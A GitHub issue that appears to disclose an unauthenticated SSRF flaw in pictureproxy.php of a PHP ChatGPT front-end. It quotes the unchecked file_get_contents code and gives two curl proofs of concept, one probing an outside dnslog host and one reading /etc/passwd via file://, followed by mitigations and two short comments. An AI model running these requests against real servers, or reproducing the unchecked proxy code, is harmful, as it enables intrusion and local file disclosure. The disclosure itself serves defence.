SSRF vulnerability in `pictureproxy.php` File
zer0yu opened this issue · 2 comments
SSRF vulnerability in pictureproxy.php
File (chatgpt)
0x01 Affected version
vendor: https://github.com/dirk1983/chatgpt
php version: 7.x
0x02 Vulnerability description
A Server-Side Request Forgery (SSRF) in pictureproxy.php
file of [chatgpt](f9f4bbc) allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url
parameter. It should be noted that this vulnerability can be triggered without the need for authentication and is therefore more harmful.
The vulnerable code is located in the pictureproxy.php
file. Because the function does not perform sufficient checksumming on the url
parameter, the taint is introduced from the $_GET['url']
variable into the tainted function file_get_contents
, and after the file_get_contents
function is executed it sends a request to the URL specified by the url
parameter, eventually leading to an SSRF vulnerability.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Because the url
parameter is unrestricted, it is also possible to use the server side to send requests, such as probing web services. The corresponding PoC is as follows:
curl -i -s -k http://mm1.ltd/pictureproxy.php?url=http://hbwqkb.dnslog.cn
If open_basedir
is not configured to limit the directories that the request can manipulate, it can also result in arbitrary local file reads. The corresponding PoC is as follows:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/passwd
0x03 Mitigation
- It is recommended to change the
open_basedir
parameter in thephp.ini
configuration file to restrict the directories that can be accessed - It is recommended that an authentication function be added to limit the users who can use this feature
0x04 Acknowledgement
z3
Thanks for your kindness reminder.
前两天刚看到这条信息。内心OS:人家就好朋友们分享着用用,这都得提个漏洞,大哥你是真的饿了(手动狗头)